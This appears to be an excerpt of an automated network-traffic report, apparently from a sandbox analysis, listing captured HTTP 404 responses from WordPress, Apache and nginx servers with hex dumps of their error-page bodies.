Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/8.2.27expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://primepath.net/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Mon, 10 Mar 2025 08:22:41 GMTserver: LiteSpeedData Raw: 31 65 35 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d 6b 73 1b b7 92 e8 67 b2 ea fc 07 68 5c 2b 71 ec 79 f3 4d 91 ca 49 1c 67 93 3d 76 9c f5 63 b7 6e 59 5e 2d 38 03 92 b0 e7 15 00 14 a9 e8 e8 07 dd bf 71 7f d9 56 03 f3 22 39 22 f5 ca b9 bb b5 76 25 e2 0c 06 e8 6e 34 1a dd 8d 57 63 7c f4 e3 db 97 1f fe cf 6f af d0 42 44 e1 59 b3 39 86 5f 14 e2 78 3e d1 d4 5f 12 9b 1f df 6b da 59 13 21 84 c6 0b 82 03 f5 28 5f 23 22 30 5a 08 91 9a e4 f7 25 bd 9c 68 2f 93 58 90 58 98 1f ae 52 a2 21 5f bd 4d 34 41 d6 c2 06 d0 a7 c8 5f 60 c6 89 98 7c fc f0 93 39 c8 c0 96 b0 62 1c 91 89 16 10 ee 33 9a 0a 9a c4 15 20 7f c3 82 c4 c8 44 6f 68 4c 23 1c a2 1f c2 64 8e 8e 71 94 9e a2 37 78 8e ff a0 31 41 3f 7f 78 f3 1a 7d 58 90 88 dc 02 fa 92 92 55 9a 30 51 81 bb a2 81 58 4c 02 72 49 7d 62 ca 17 03 d1 98 0a 8a 43 93 fb 38 24 13 d7 40 11 5e d3 68 19 e5 09 55 e8 21 8d bf a2 05 23 b3 89 06 ac e0 23 db f6 83 d8 fa c2 03 12 d2 4b 66 c5 44 d8 71 1a d9 8c 44 74 4d fd 24 fe 6b c7 72 2d c7 9e 25 b1 e0 65 aa e5 73 ae 21 46 c2 89 c6 c5 55 48 f8 82 10 a1 21 3b e3 bc a0 22 24 67 bf e1 39 41 71 22 d0 2c 59 c6 01 3a 7e 36 f0 5c f7 14 fd c6 68 44 d0 6f 58 2c c6 b6 ca d8 1c cb b6 91 fc 3c 61 c9 34 11 fc a4 68 8f 93 08 af 4d 1a e1 39 31 53 46 80 25 a3 10 b3 39 39 01 6c 8d b1 44 7f 46 a3 f9 88 f2 d6 27 4e ff 20 7c a2 e1 a5 48 34 44 3f 1b 48 a5 fc 87 4a 32 20 4d 47 d7 12 36 a6 b1 49 63 c1 68 cc a9 6f 42 c1 11 6a 3b 8e 93 ae 91 db 95 3f 37 63 5b 41 6f 36 c6 92 6f 50 df 93 20 e6 40 c8 8c 08 7f 71 a2 58 79 62 db 29 54 2a c5 62 01 1c 94 a4 8d 95 58 20 71 95 92 4c a8 be e0 4b ac 52 b5 b3 a6 fd 1c 8d 8f 3e bd fc f1 fb 0f df 7f 42 cf ed e6 8a c6 41 b2 b2 2e 56 29 89 92 2f f4 3d 11 82 c6 73 8e 26 e8 5a 9b 62 4e 3e b2 50 1b 65 8d 76 6e 9f db dc 5a 59 09 9b 9f db 92 37 fc dc f6 13 46 ce 6d 59 f8 dc 76 bb 96 63 b5 cf ed be b7 ee 7b e7 b6 66 68 64 2d b4 91 66 a5 f1 5c 33 34 7e 39 7f 18 3c 7e 39 97 d0 f8 e5 fc 95 02 c8 2f 25 c0 64 c9 7c a2 8d ae 35 3f 89 7d 2c 24 19 19 bd 23 20 77 83 41 e7 f6 2a 35 69 ec 87 cb 80 f0 73 fb 0b 97 09 b2 8c c9 48 48 30 27 56 44 41 2c bf bb 24 6c d2 b3 fa 96 a7 dd dc 9c 36 ed e7 47 e8 c3 82 72 34 a3 21 41 94 23 68 69 73 4e 62 c2 b0 20 01 f0 f1 68 b6 8c 7d e8 8d 2d 6a c4 fa f5 25 66 28 31 b8 41 4e f3 74 e4 b7 88 7e 2d d8 95 fc 26 26 d7 7c 99 42 2f fb 40 b8 e0 23 62 08 1a 11 2e 70 94 8e 5a 31 59 a1 1f b1 20 ba 75 89 c3 25 79 3b 6b e9 37 a7 9c 70 4e 93 f8 bd 48 18 9e 13 8b 13 f1 8b 20 51 2b 31 fe e5 fd db 5f 2d 0e 12 35 a7 b3 ab 96 d0 f5 1b 1f 0b 7f 01 e8 6e 6e 0a f4 69 8b 18 02 48 23 96 1f 12 cc Data Ascii: 1e5b}ksgh\+qyMIg=vcnY^-8qV
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/8.2.27expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://primepath.net/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Mon, 10 Mar 2025 08:22:43 GMTserver: LiteSpeedData Raw: 31 65 35 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d 6b 73 1b b7 92 e8 67 b2 ea fc 07 68 5c 2b 71 ec 79 f3 4d 91 ca 49 1c 67 93 3d 76 9c f5 63 b7 6e 59 5e 2d 38 03 92 b0 e7 15 00 14 a9 e8 e8 07 dd bf 71 7f d9 56 03 f3 22 39 22 f5 ca b9 bb b5 76 25 e2 0c 06 e8 6e 34 1a dd 8d 57 63 7c f4 e3 db 97 1f fe cf 6f af d0 42 44 e1 59 b3 39 86 5f 14 e2 78 3e d1 d4 5f 12 9b 1f df 6b da 59 13 21 84 c6 0b 82 03 f5 28 5f 23 22 30 5a 08 91 9a e4 f7 25 bd 9c 68 2f 93 58 90 58 98 1f ae 52 a2 21 5f bd 4d 34 41 d6 c2 06 d0 a7 c8 5f 60 c6 89 98 7c fc f0 93 39 c8 c0 96 b0 62 1c 91 89 16 10 ee 33 9a 0a 9a c4 15 20 7f c3 82 c4 c8 44 6f 68 4c 23 1c a2 1f c2 64 8e 8e 71 94 9e a2 37 78 8e ff a0 31 41 3f 7f 78 f3 1a 7d 58 90 88 dc 02 fa 92 92 55 9a 30 51 81 bb a2 81 58 4c 02 72 49 7d 62 ca 17 03 d1 98 0a 8a 43 93 fb 38 24 13 d7 40 11 5e d3 68 19 e5 09 55 e8 21 8d bf a2 05 23 b3 89 06 ac e0 23 db f6 83 d8 fa c2 03 12 d2 4b 66 c5 44 d8 71 1a d9 8c 44 74 4d fd 24 fe 6b c7 72 2d c7 9e 25 b1 e0 65 aa e5 73 ae 21 46 c2 89 c6 c5 55 48 f8 82 10 a1 21 3b e3 bc a0 22 24 67 bf e1 39 41 71 22 d0 2c 59 c6 01 3a 7e 36 f0 5c f7 14 fd c6 68 44 d0 6f 58 2c c6 b6 ca d8 1c cb b6 91 fc 3c 61 c9 34 11 fc a4 68 8f 93 08 af 4d 1a e1 39 31 53 46 80 25 a3 10 b3 39 39 01 6c 8d b1 44 7f 46 a3 f9 88 f2 d6 27 4e ff 20 7c a2 e1 a5 48 34 44 3f 1b 48 a5 fc 87 4a 32 20 4d 47 d7 12 36 a6 b1 49 63 c1 68 cc a9 6f 42 c1 11 6a 3b 8e 93 ae 91 db 95 3f 37 63 5b 41 6f 36 c6 92 6f 50 df 93 20 e6 40 c8 8c 08 7f 71 a2 58 79 62 db 29 54 2a c5 62 01 1c 94 a4 8d 95 58 20 71 95 92 4c a8 be e0 4b ac 52 b5 b3 a6 fd 1c 8d 8f 3e bd fc f1 fb 0f df 7f 42 cf ed e6 8a c6 41 b2 b2 2e 56 29 89 92 2f f4 3d 11 82 c6 73 8e 26 e8 5a 9b 62 4e 3e b2 50 1b 65 8d 76 6e 9f db dc 5a 59 09 9b 9f db 92 37 fc dc f6 13 46 ce 6d 59 f8 dc 76 bb 96 63 b5 cf ed be b7 ee 7b e7 b6 66 68 64 2d b4 91 66 a5 f1 5c 33 34 7e 39 7f 18 3c 7e 39 97 d0 f8 e5 fc 95 02 c8 2f 25 c0 64 c9 7c a2 8d ae 35 3f 89 7d 2c 24 19 19 bd 23 20 77 83 41 e7 f6 2a 35 69 ec 87 cb 80 f0 73 fb 0b 97 09 b2 8c c9 48 48 30 27 56 44 41 2c bf bb 24 6c d2 b3 fa 96 a7 dd dc 9c 36 ed e7 47 e8 c3 82 72 34 a3 21 41 94 23 68 69 73 4e 62 c2 b0 20 01 f0 f1 68 b6 8c 7d e8 8d 2d 6a c4 fa f5 25 66 28 31 b8 41 4e f3 74 e4 b7 88 7e 2d d8 95 fc 26 26 d7 7c 99 42 2f fb 40 b8 e0 23 62 08 1a 11 2e 70 94 8e 5a 31 59 a1 1f b1 20 ba 75 89 c3 25 79 3b 6b e9 37 a7 9c 70 4e 93 f8 bd 48 18 9e 13 8b 13 f1 8b 20 51 2b 31 fe e5 fd db 5f 2d 0e 12 35 a7 b3 ab 96 d0 f5 1b 1f 0b 7f 01 e8 6e 6e 0a f4 69 8b 18 02 48 23 96 1f 12 cc Data Ascii: 1e5b}ksgh\+qyMIg=vcnY^-8qV
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/8.2.27expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://primepath.net/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Mon, 10 Mar 2025 08:22:46 GMTserver: LiteSpeedData Raw: 31 65 35 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d 6b 73 1b b7 92 e8 67 b2 ea fc 07 68 5c 2b 71 ec 79 f3 4d 91 ca 49 1c 67 93 3d 76 9c f5 63 b7 6e 59 5e 2d 38 03 92 b0 e7 15 00 14 a9 e8 e8 07 dd bf 71 7f d9 56 03 f3 22 39 22 f5 ca b9 bb b5 76 25 e2 0c 06 e8 6e 34 1a dd 8d 57 63 7c f4 e3 db 97 1f fe cf 6f af d0 42 44 e1 59 b3 39 86 5f 14 e2 78 3e d1 d4 5f 12 9b 1f df 6b da 59 13 21 84 c6 0b 82 03 f5 28 5f 23 22 30 5a 08 91 9a e4 f7 25 bd 9c 68 2f 93 58 90 58 98 1f ae 52 a2 21 5f bd 4d 34 41 d6 c2 06 d0 a7 c8 5f 60 c6 89 98 7c fc f0 93 39 c8 c0 96 b0 62 1c 91 89 16 10 ee 33 9a 0a 9a c4 15 20 7f c3 82 c4 c8 44 6f 68 4c 23 1c a2 1f c2 64 8e 8e 71 94 9e a2 37 78 8e ff a0 31 41 3f 7f 78 f3 1a 7d 58 90 88 dc 02 fa 92 92 55 9a 30 51 81 bb a2 81 58 4c 02 72 49 7d 62 ca 17 03 d1 98 0a 8a 43 93 fb 38 24 13 d7 40 11 5e d3 68 19 e5 09 55 e8 21 8d bf a2 05 23 b3 89 06 ac e0 23 db f6 83 d8 fa c2 03 12 d2 4b 66 c5 44 d8 71 1a d9 8c 44 74 4d fd 24 fe 6b c7 72 2d c7 9e 25 b1 e0 65 aa e5 73 ae 21 46 c2 89 c6 c5 55 48 f8 82 10 a1 21 3b e3 bc a0 22 24 67 bf e1 39 41 71 22 d0 2c 59 c6 01 3a 7e 36 f0 5c f7 14 fd c6 68 44 d0 6f 58 2c c6 b6 ca d8 1c cb b6 91 fc 3c 61 c9 34 11 fc a4 68 8f 93 08 af 4d 1a e1 39 31 53 46 80 25 a3 10 b3 39 39 01 6c 8d b1 44 7f 46 a3 f9 88 f2 d6 27 4e ff 20 7c a2 e1 a5 48 34 44 3f 1b 48 a5 fc 87 4a 32 20 4d 47 d7 12 36 a6 b1 49 63 c1 68 cc a9 6f 42 c1 11 6a 3b 8e 93 ae 91 db 95 3f 37 63 5b 41 6f 36 c6 92 6f 50 df 93 20 e6 40 c8 8c 08 7f 71 a2 58 79 62 db 29 54 2a c5 62 01 1c 94 a4 8d 95 58 20 71 95 92 4c a8 be e0 4b ac 52 b5 b3 a6 fd 1c 8d 8f 3e bd fc f1 fb 0f df 7f 42 cf ed e6 8a c6 41 b2 b2 2e 56 29 89 92 2f f4 3d 11 82 c6 73 8e 26 e8 5a 9b 62 4e 3e b2 50 1b 65 8d 76 6e 9f db dc 5a 59 09 9b 9f db 92 37 fc dc f6 13 46 ce 6d 59 f8 dc 76 bb 96 63 b5 cf ed be b7 ee 7b e7 b6 66 68 64 2d b4 91 66 a5 f1 5c 33 34 7e 39 7f 18 3c 7e 39 97 d0 f8 e5 fc 95 02 c8 2f 25 c0 64 c9 7c a2 8d ae 35 3f 89 7d 2c 24 19 19 bd 23 20 77 83 41 e7 f6 2a 35 69 ec 87 cb 80 f0 73 fb 0b 97 09 b2 8c c9 48 48 30 27 56 44 41 2c bf bb 24 6c d2 b3 fa 96 a7 dd dc 9c 36 ed e7 47 e8 c3 82 72 34 a3 21 41 94 23 68 69 73 4e 62 c2 b0 20 01 f0 f1 68 b6 8c 7d e8 8d 2d 6a c4 fa f5 25 66 28 31 b8 41 4e f3 74 e4 b7 88 7e 2d d8 95 fc 26 26 d7 7c 99 42 2f fb 40 b8 e0 23 62 08 1a 11 2e 70 94 8e 5a 31 59 a1 1f b1 20 ba 75 89 c3 25 79 3b 6b e9 37 a7 9c 70 4e 93 f8 bd 48 18 9e 13 8b 13 f1 8b 20 51 2b 31 fe e5 fd db 5f 2d 0e 12 35 a7 b3 ab 96 d0 f5 1b 1f 0b 7f 01 e8 6e 6e 0a f4 69 8b 18 02 48 23 96 1f 12 cc Data Ascii: 1e5b}ksgh\+qyMIg=vcnY^-8qV
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 10 Mar 2025 08:22:54 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 10 Mar 2025 08:22:56 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 10 Mar 2025 08:22:59 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 10 Mar 2025 08:23:02 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 10 Mar 2025 08:23:54 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 10 Mar 2025 08:24:02 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 10 Mar 2025 08:24:05 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 